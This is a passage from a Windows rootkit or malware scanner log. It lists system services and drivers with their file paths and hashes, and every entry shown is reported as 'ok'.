21:57:16.0957 0x1a10 [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg C:\Windows\system32\pnrpauto.dll
21:57:17.0034 0x1a10 PNRPAutoReg - ok
21:57:17.0064 0x1a10 [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc C:\Windows\system32\pnrpsvc.dll
21:57:17.0104 0x1a10 PNRPsvc - ok
21:57:17.0184 0x1a10 [ 80D6B0563ED2BF10656B1D4748331082, B7E6B5E1148B7EE537E8D5C3A65450876B61CD45A395267D08699746E98AD574 ] PolicyAgent C:\Windows\System32\ipsecsvc.dll
21:57:17.0244 0x1a10 PolicyAgent - ok
21:57:17.0334 0x1a10 PostgreSQL 9.6 Server - ok
21:57:17.0364 0x1a10 [ A2CCA4FB273E6050F17A0A416CFF2FCD, C42BA18DF0C8E3F7358669A784E51E4DC7A4112096345EA699EDC95F561E0255 ] Power C:\Windows\system32\umpo.dll
21:57:17.0434 0x1a10 Power - ok
21:57:17.0474 0x1a10 [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport C:\Windows\system32\DRIVERS\raspptp.sys
21:57:17.0554 0x1a10 PptpMiniport - ok
21:57:17.0574 0x1a10 [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor C:\Windows\system32\drivers\processr.sys
21:57:17.0624 0x1a10 Processor - ok
21:57:17.0654 0x1a10 [ B6A58491307B4CADA572583D863DC602, 5C44936605E52C9533E4CE22F18FAB8211475877F71EFD88DA4D02FD608C90A3 ] ProfSvc C:\Windows\system32\profsvc.dll
21:57:17.0714 0x1a10 ProfSvc - ok
21:57:17.0734 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] ProtectedStorage C:\Windows\system32\lsass.exe
21:57:17.0764 0x1a10 ProtectedStorage - ok
21:57:17.0804 0x1a10 [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched C:\Windows\system32\DRIVERS\pacer.sys
21:57:17.0864 0x1a10 Psched - ok
21:57:17.0984 0x1a10 [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300 C:\Windows\system32\drivers\ql2300.sys
21:57:18.0070 0x1a10 ql2300 - ok
21:57:18.0140 0x1a10 [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx C:\Windows\system32\drivers\ql40xx.sys
21:57:18.0199 0x1a10 ql40xx - ok
21:57:18.0245 0x1a10 [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE C:\Windows\system32\qwave.dll
21:57:18.0285 0x1a10 QWAVE - ok
21:57:18.0335 0x1a10 [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv C:\Windows\system32\drivers\qwavedrv.sys
21:57:18.0375 0x1a10 QWAVEdrv - ok
21:57:18.0395 0x1a10 [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd C:\Windows\system32\DRIVERS\rasacd.sys
21:57:18.0455 0x1a10 RasAcd - ok
21:57:18.0485 0x1a10 [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn C:\Windows\system32\DRIVERS\AgileVpn.sys
21:57:18.0545 0x1a10 RasAgileVpn - ok
21:57:18.0585 0x1a10 [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto C:\Windows\System32\rasauto.dll
21:57:18.0891 0x1a10 RasAuto - ok
21:57:18.0946 0x1a10 [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp C:\Windows\system32\DRIVERS\rasl2tp.sys
21:57:19.0018 0x1a10 Rasl2tp - ok
21:57:19.0096 0x1a10 [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan C:\Windows\System32\rasmans.dll
21:57:19.0182 0x1a10 RasMan - ok
21:57:19.0301 0x1a10 [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe C:\Windows\system32\DRIVERS\raspppoe.sys
21:57:19.0507 0x1a10 RasPppoe - ok
21:57:19.0550 0x1a10 [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp C:\Windows\system32\DRIVERS\rassstp.sys
21:57:19.0618 0x1a10 RasSstp - ok
21:57:19.0656 0x1a10 [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss C:\Windows\system32\DRIVERS\rdbss.sys
21:57:19.0761 0x1a10 rdbss - ok
21:57:19.0811 0x1a10 [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus C:\Windows\system32\drivers\rdpbus.sys
21:57:19.0891 0x1a10 rdpbus - ok
21:57:19.0941 0x1a10 [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD C:\Windows\system32\DRIVERS\RDPCDD.sys
21:57:20.0011 0x1a10 RDPCDD - ok
21:57:20.0104 0x1a10 [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] RDPDR C:\Windows\system32\drivers\rdpdr.sys
21:57:20.0180 0x1a10 RDPDR - ok
21:57:20.0211 0x1a10 [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD C:\Windows\system32\drivers\rdpencdd.sys
21:57:20.0277 0x1a10 RDPENCDD - ok
21:57:20.0327 0x1a10 [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP C:\Windows\system32\drivers\rdprefmp.sys
21:57:20.0397 0x1a10 RDPREFMP - ok
21:57:20.0507 0x1a10 [ 313F68E1A3E6345A4F47A36B07062F34, B8318A0AE06BDE278931CA52F960B9FE226FD9894B076858DDB755AE26E1E66F ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
21:57:20.0690 0x1a10 RdpVideoMiniport - ok
21:57:20.0720 0x1a10 [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD C:\Windows\system32\drivers\RDPWD.sys
21:57:20.0790 0x1a10 RDPWD - ok
21:57:20.0860 0x1a10 [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost C:\Windows\system32\drivers\rdyboost.sys
21:57:20.0900 0x1a10 rdyboost - ok
21:57:20.0930 0x1a10 [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess C:\Windows\System32\mprdim.dll
21:57:20.0990 0x1a10 RemoteAccess - ok
21:57:21.0040 0x1a10 [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry C:\Windows\system32\regsvc.dll
21:57:21.0140 0x1a10 RemoteRegistry - ok
21:57:21.0200 0x1a10 [ 3DD798846E2C28102B922C56E71B7932, 30B111615D74CB2213997A5C08DD9C8613ADE441D9423CC1C49A753D13CE524D ] RFCOMM C:\Windows\system32\DRIVERS\rfcomm.sys
21:57:21.0240 0x1a10 RFCOMM - ok
21:57:21.0270 0x1a10 [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper C:\Windows\System32\RpcEpMap.dll
21:57:21.0350 0x1a10 RpcEptMapper - ok
21:57:21.0380 0x1a10 [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator C:\Windows\system32\locator.exe
21:57:21.0420 0x1a10 RpcLocator - ok
21:57:21.0514 0x1a10 [ 3F1A199859B4F3F8357B2A0AF5666A54, B0ACE9384088B7D0E54CF82BF48D4FEAA518BDEF98A294BA8F5A37DFF0E45328 ] RpcSs C:\Windows\system32\rpcss.dll
21:57:21.0564 0x1a10 RpcSs - ok
21:57:21.0624 0x1a10 [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr C:\Windows\system32\DRIVERS\rspndr.sys
21:57:21.0694 0x1a10 rspndr - ok
21:57:21.0764 0x1a10 [ F1D20C2B36F78863530B251DF504CC51, A3C71BDB45B1DB321BC2D9889CB25CF7840E145DFB769882748B7D507A605A42 ] RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
21:57:21.0804 0x1a10 RtkAudioService - ok
21:57:21.0877 0x1a10 [ 8FA11ECB00AED22ACFEA154B7981D9E6, E72363AB33B17B4942187DADEC8DD9ECB047D2BCAE359148FA2F70EEF935264E ] RtkAvrcp C:\Windows\system32\DRIVERS\RtkAvrcp.sys
21:57:21.0917 0x1a10 RtkAvrcp - ok
21:57:21.0987 0x1a10 [ 1A4E6A6B7A6C57F89F9967148B72F272, AD288FA74D48B5BC93E2B23FC70BCF5BF36B0E052F007B0DEBEA270D21A4A402 ] RtkBtFilter C:\Windows\system32\DRIVERS\RtkBtfilter.sys
21:57:22.0027 0x1a10 RtkBtFilter - ok
21:57:22.0107 0x1a10 [ 46596144363B912105F70016F0E2F908, 199FF8BFA60D8E9662F3C785146FAED3231B514D260F795B2B9857DC1EEB2E4B ] RTL8167 C:\Windows\system32\DRIVERS\Rt64win7.sys
21:57:22.0157 0x1a10 RTL8167 - ok
21:57:22.0207 0x1a10 [ D82269634BA995825E5D9166B35F8184, D81B6BE3BA0C1CCB1B89974BE24E02536DF63091871D55F5EF34C689EBEB7D7E ] RTSPER C:\Windows\system32\DRIVERS\RtsPer.sys
21:57:22.0247 0x1a10 RTSPER - ok
21:57:22.0659 0x1a10 [ 5EE68ED7C375FD7E4A9076FB08BC6616, A149F0E533EA69E1DEACEBA1DA0497F533F9FF37ED2AAAB87085CED0C809E515 ] RTWlanE C:\Windows\system32\DRIVERS\rtwlane.sys
21:57:22.0879 0x1a10 RTWlanE - ok
21:57:23.0064 0x1a10 [ E60C0A09F997826C7627B244195AB581, E8630ED74B38B98BF584E353D992C1311BC36AB7F20A1BB66C9CD65CE1E46F8D ] s3cap C:\Windows\system32\drivers\vms3cap.sys
21:57:23.0124 0x1a10 s3cap - ok
21:57:23.0154 0x1a10 [ 00A54A6CEDF599AABB72C20E0815BC37, 09835A43E1A17396BDC88BB38EF66EA8854913040347D9893EBF8550D0AA1452 ] SamSs C:\Windows\system32\lsass.exe
21:57:23.0184 0x1a10 SamSs - ok
21:57:23.0274 0x1a10 [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port C:\Windows\system32\drivers\sbp2port.sys
21:57:23.0344 0x1a10 sbp2port - ok
21:57:23.0374 0x1a10 [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr C:\Windows\System32\SCardSvr.dll
21:57:23.0444 0x1a10 SCardSvr - ok
21:57:23.0484 0x1a10 [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter C:\Windows\system32\DRIVERS\scfilter.sys
21:57:23.0584 0x1a10 scfilter - ok
21:57:23.0744 0x1a10 [ 40686B59C127F0C93B4234E4A1E3472A, B2DD61CB796C6AA8AFD285D43472B94646CA6D331D282818E0FDC9DE28DDE9CF ] Schedule C:\Windows\system32\schedsvc.dll
21:57:23.0914 0x1a10 Schedule - ok
21:57:24.0014 0x1a10 [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc C:\Windows\System32\certprop.dll
21:57:24.0094 0x1a10 SCPolicySvc - ok
21:57:24.0141 0x1a10 [ 111E0EBC0AD79CB0FA014B907B231CF0, B7D43D156C2524938503CF8E99C4D1F7A5C55E16C0368F57F4CD23C6D833B38F ] sdbus C:\Windows\system32\DRIVERS\sdbus.sys
21:57:24.0171 0x1a10 sdbus - ok
21:57:24.0241 0x1a10 [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC C:\Windows\System32\SDRSVC.dll
21:57:24.0327 0x1a10 SDRSVC - ok
21:57:24.0357 0x1a10 [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv C:\Windows\system32\drivers\secdrv.sys
21:57:24.0397 0x1a10 secdrv - ok
21:57:24.0437 0x1a10 [ A19623BDD61E66A12AB53992002B4F3A, E351CEEC086084A417BA3BD0EEF46114D3147EC38E3EF8BE49B724F9D028CC56 ] seclogon C:\Windows\system32\seclogon.dll
21:57:24.0527 0x1a10 seclogon - ok
21:57:24.0577 0x1a10 [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS C:\Windows\System32\sens.dll
21:57:24.0657 0x1a10 SENS - ok
21:57:24.0677 0x1a10 [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc C:\Windows\system32\sensrsvc.dll
21:57:24.0837 0x1a10 SensrSvc - ok
21:57:24.0877 0x1a10 [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum C:\Windows\system32\drivers\serenum.sys
21:57:24.0907 0x1a10 Serenum - ok
21:57:24.0957 0x1a10 [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial C:\Windows\system32\drivers\serial.sys
21:57:25.0007 0x1a10 Serial - ok
21:57:25.0047 0x1a10 [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse C:\Windows\system32\drivers\sermouse.sys
21:57:25.0077 0x1a10 sermouse - ok
21:57:25.0157 0x1a10 [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv C:\Windows\system32\sessenv.dll
21:57:25.0277 0x1a10 SessionEnv - ok
21:57:25.0337 0x1a10 [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk C:\Windows\system32\drivers\sffdisk.sys
21:57:25.0437 0x1a10 sffdisk - ok
21:57:25.0467 0x1a10 [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc C:\Windows\system32\drivers\sffp_mmc.sys
21:57:25.0504 0x1a10 sffp_mmc - ok
21:57:25.0524 0x1a10 [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd C:\Windows\system32\drivers\sffp_sd.sys
21:57:25.0564 0x1a10 sffp_sd - ok
21:57:25.0624 0x1a10 [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy C:\Windows\system32\drivers\sfloppy.sys
21:57:25.0684 0x1a10 sfloppy - ok
21:57:25.0744 0x1a10 [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess C:\Windows\System32\ipnathlp.dll
21:57:25.0834 0x1a10 SharedAccess - ok
21:57:25.0914 0x1a10 [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
21:57:26.0024 0x1a10 ShellHWDetection - ok
21:57:26.0054 0x1a10 [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2 C:\Windows\system32\drivers\SiSRaid2.sys
21:57:26.0084 0x1a10 SiSRaid2 - ok
21:57:26.0124 0x1a10 [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4 C:\Windows\system32\drivers\sisraid4.sys
21:57:26.0184 0x1a10 SiSRaid4 - ok
21:57:26.0304 0x1a10 [ 22CC2A61BC77C5972B58756049AA254E, 4DF554A1C2FF8C2D9AD8633231961DE95171A17295DAA7779E607AFD7BD8FE03 ] SkypeUpdate C:\Program Files (x86)\Skype\Updater\Updater.exe
21:57:26.0364 0x1a10 SkypeUpdate - ok
21:57:26.0414 0x1a10 [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb C:\Windows\system32\DRIVERS\smb.sys
21:57:26.0504 0x1a10 Smb - ok
21:57:26.0564 0x1a10 [ 67B3D860F034C15F09B2CD161FB2801C, F6460C4E677176C4134BE97DFB255A0B0EA6F4B62DE26FC3AFDC0D526111404F ] SmbDrv C:\Windows\system32\drivers\Smb_driver_AMDASF.sys
21:57:26.0604 0x1a10 SmbDrv - ok
21:57:26.0644 0x1a10 [ 049BD8F517918E3A524940AABDDA6167, 3C7BC7EC07BDAFAD27D4A325FC2C444FCCACCAA06DE48B2B8C9CCDE6B8DC5E1C ] SmbDrvI C:\Windows\system32\drivers\Smb_driver_Intel.sys
21:57:26.0674 0x1a10 SmbDrvI - ok
21:57:26.0754 0x1a10 [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP C:\Windows\System32\snmptrap.exe
21:57:26.0824 0x1a10 SNMPTRAP - ok
21:57:26.0884 0x1a10 [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr C:\Windows\system32\drivers\spldr.sys
21:57:26.0934 0x1a10 spldr - ok
21:57:27.0014 0x1a10 [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler C:\Windows\System32\spoolsv.exe
21:57:27.0134 0x1a10 Spooler - ok
21:57:27.0354 0x1a10 [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc C:\Windows\system32\sppsvc.exe
21:57:27.0514 0x1a10 sppsvc - ok
21:57:27.0554 0x1a10 [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify C:\Windows\system32\sppuinotify.dll
21:57:27.0617 0x1a10 sppuinotify - ok
21:57:27.0677 0x1a10 [ 9FDD80B815A7F29554FF6E0D77A7F60D, 768F1173063FDEDCFD98FF3D4E8D9A21E9F9C1E768C3C88D6649DF801F0D9044 ] srv C:\Windows\system32\DRIVERS\srv.sys
21:57:27.0747 0x1a10 srv - ok
21:57:27.0837 0x1a10 [ D62B353400F2C1FD0A5E93F8BDA83715, D7CD9E9FC235C599F408862B65ED6025EDA335071C6B4F315431D6E82071B253 ] srv2 C:\Windows\system32\DRIVERS\srv2.sys
21:57:28.0027 0x1a10 srv2 - ok
21:57:28.0077 0x1a10 [ 0C4540311E11664B245A263E1154CEF8, 63376322BFFAFF2F166AF3FDD3F1A346C21FAE21F406F659F8630779D1D6525D ] SrvHsfHDA C:\Windows\system32\DRIVERS\VSTAZL6.SYS
21:57:28.0117 0x1a10 SrvHsfHDA - ok
21:57:28.0227 0x1a10 [ 02071D207A9858FBE3A48CBFD59C4A04, FEA4DEBAEC3465E0C7C1E8B721805922F6BBCB96A60A193B11688F4252F4B89E ] SrvHsfV92 C:\Windows\system32\DRIVERS\VSTDPV6.SYS
21:57:28.0317 0x1a10 SrvHsfV92 - ok
21:57:28.0377 0x1a10 [ 18E40C245DBFAF36FD0134A7EF2DF396, 0138A68958112101A5D3BD94114F320CE80B0C9A93E009AC78DE7415FCCC7DE7 ] SrvHsfWinac C:\Windows\system32\DRIVERS\VSTCNXT6.SYS
21:57:28.0467 0x1a10 SrvHsfWinac - ok
21:57:28.0517 0x1a10 [ CAEAA7FF473E33DB8E5B72AB145907D3, 8BF6F274F975A600E6E63637C3F9E425EEE64198F4780C9818CA7856AD683CA2 ] srvnet C:\Windows\system32\DRIVERS\srvnet.sys
21:57:28.0567 0x1a10 srvnet - ok
21:57:28.0607 0x1a10 [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV C:\Windows\System32\ssdpsrv.dll
21:57:28.0667 0x1a10 SSDPSRV - ok
21:57:28.0687 0x1a10 [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc C:\Windows\system32\sstpsvc.dll
21:57:28.0757 0x1a10 SstpSvc - ok
21:57:28.0847 0x1a10 [ 592FF34A2FD6C6351B8A3AA76B2C0A9E, 152B7472DE531AC45492F562DD470B2CE33F1EEF13BC78F26046AE5ABF54E32F ] ssudmdm C:\Windows\system32\DRIVERS\ssudmdm.sys
21:57:28.0927 0x1a10 ssudmdm - ok
21:57:28.0957 0x1a10 [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor C:\Windows\system32\drivers\stexstor.sys
21:57:28.0977 0x1a10 stexstor - ok
21:57:29.0037 0x1a10 [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc C:\Windows\System32\wiaservc.dll
21:57:29.0137 0x1a10 stisvc - ok
21:57:29.0157 0x1a10 [ 7785DC213270D2FC066538DAF94087E7, F09CB2895241719CA5147B2EE9F7ECBD0303AFFB5CD896F06D4D29BAAAFC207B ] storflt C:\Windows\system32\drivers\vmstorfl.sys
21:57:29.0187 0x1a10 storflt - ok
21:57:29.0227 0x1a10 [ C40841817EF57D491F22EB103DA587CC, 5FAA2DE43BADC16A898C0C290C44C41E4411D919A95FE8C6FF45EA7A34495079 ] StorSvc C:\Windows\system32\storsvc.dll
21:57:29.0267 0x1a10 StorSvc - ok
21:57:29.0297 0x1a10 [ D34E4943D5AC096C8EDEEBFD80D76E23, 1DD7F6F97060B5F763A04ACA1F75E59DAB09EF824FD09B83FC3C192837D006DE ] storvsc C:\Windows\system32\drivers\storvsc.sys
21:57:29.0327 0x1a10 storvsc - ok
21:57:29.0347 0x1a10 [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum C:\Windows\system32\drivers\swenum.sys
21:57:29.0367 0x1a10 swenum - ok
21:57:29.0497 0x1a10 [ E08E46FDD841B7184194011CA1955A0B, 9C3725BB1F08F92744C980A22ED5C874007D3B5863C7E1F140F50061052AC418 ] swprv C:\Windows\System32\swprv.dll
21:57:29.0598 0x1a10 swprv - ok
21:57:29.0658 0x1a10 [ 759136661CE0EA0A53425DEB5C77289E, F4C268DD11B634D06C84162B89AD28BAB27FF1498D8C7DC6F39914086F58C216 ] SynTP C:\Windows\system32\DRIVERS\SynTP.sys
21:57:29.0700 0x1a10 SynTP - ok
21:57:29.0805 0x1a10 [ 19191153EAB5AC769770420B5FD61122, 2127067B42FDBC3781D153FB4FB6659619A1948DF4D5632212DF5EF72C91AC3D ] SynTPEnhService C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
21:57:29.0923 0x1a10 SynTPEnhService - ok
21:57:30.0038 0x1a10 [ 2E730941CC5BF6200A4F56D1E9C24AAD, 758836D55DC84F3EBE9917DC6FAB8E6170A5B238FEDBCFDB6D7C5C6EA98E08B2 ] SysMain C:\Windows\system32\sysmain.dll
21:57:30.0198 0x1a10 SysMain - ok
21:57:30.0251 0x1a10 [ E3C61FD7B7C2557E1F1B0B4CEC713585, 01F0E116606D185BF93B540868075BFB1A398197F6AABD994983DBFF56B3A8A0 ] TabletInputService C:\Windows\System32\TabSvc.dll
21:57:30.0300 0x1a10 TabletInputService - ok
21:57:30.0335 0x1a10 [ 40F0849F65D13EE87B9A9AE3C1DD6823, E251A7EF3D0FD2973AF33A62FC457A7E8D5E8694208F811F52455F7C2426121F ] TapiSrv C:\Windows\System32\tapisrv.dll
21:57:30.0405 0x1a10 TapiSrv - ok
21:57:30.0569 0x1a10 [ 7FB36A0A036ADDACE0A868E4A43C1C27, AFDCD57C49D06F31C02F37C81B67BA148CDC9B62AD62B771925D31339DDA9012 ] Tcpip C:\Windows\system32\drivers\tcpip.sys
21:57:30.0673 0x1a10 Tcpip - ok
21:57:30.0756 0x1a10 [ 7FB36A0A036ADDACE0A868E4A43C1C27, AFDCD57C49D06F31C02F37C81B67BA148CDC9B62AD62B771925D31339DDA9012 ] TCPIP6 C:\Windows\system32\DRIVERS\tcpip.sys
21:57:30.0837 0x1a10 TCPIP6 - ok
21:57:30.0896 0x1a10 [ 7FE5586314EE7D6AA8483264A089E5AF, 4E3EA68713A45C22F1B9A1AA125E15D06D0C5E637B815537431ADFB6D7563879 ] tcpipreg C:\Windows\system32\drivers\tcpipreg.sys
21:57:30.0982 0x1a10 tcpipreg - ok
21:57:31.0014 0x1a10 [ 3371D21011695B16333A3934340C4E7C, 7416F9BBFC1BA9D875EA7D1C7A0D912FC6977B49A865D67E3F9C4E18A965082D ] TDPIPE C:\Windows\system32\drivers\tdpipe.sys
21:57:31.0067 0x1a10 TDPIPE - ok
21:57:31.0090 0x1a10 [ 51C5ECEB1CDEE2468A1748BE550CFBC8, 4E8F83877330B421F7B5D8393D34BC44C6450E69209DAA95B29CB298166A5DF9 ] TDTCP C:\Windows\system32\drivers\tdtcp.sys
21:57:31.0118 0x1a10 TDTCP - ok
21:57:31.0154 0x1a10 [ 4DD986720F7CB7A8A5D1226793097B9A, 9020375B45E9C966BF44CF425C127D7E0EC82EB99C7047F225C25402FF97743D ] tdx C:\Windows\system32\DRIVERS\tdx.sys
21:57:31.0260 0x1a10 tdx - ok
21:57:31.0817 0x1a10 [ 250B2B5807E2B0642A3E665F692F1811, 79E3318DB18BC3E5E33C1E72AE844638D3C74DE151F27A6A3A76DD3E62ED6AE8 ] TeamViewer C:\projects\TeamViewer\TeamViewer_Service.exe
21:57:32.0167 0x1a10 TeamViewer - ok
21:57:32.0217 0x1a10 [ 561E7E1F06895D78DE991E01DD0FB6E5, 83BFA50A528762EC52A011302AC3874636FB7E26628CD7ACFBF2BDC9FAA8110D ] TermDD C:\Windows\system32\drivers\termdd.sys
21:57:32.0247 0x1a10 TermDD - ok
21:57:32.0297 0x1a10 [ 008CD4EBFABCF78D0F19B3778492648C, 9050490EEE0AD86E73F0A82D83E4FC29DF84F6B6FDB389AE135FD712B5F425BE ] TermService C:\Windows\System32\termsrv.dll
21:57:32.0409 0x1a10 TermService - ok
21:57:32.0459 0x1a10 [ F0344071948D1A1FA732231785A0664C, DB9886C2C858FAF45AEA15F8E42860343F73EB8685C53EC2E8CCC10586CB0832 ] Themes C:\Windows\system32\themeservice.dll
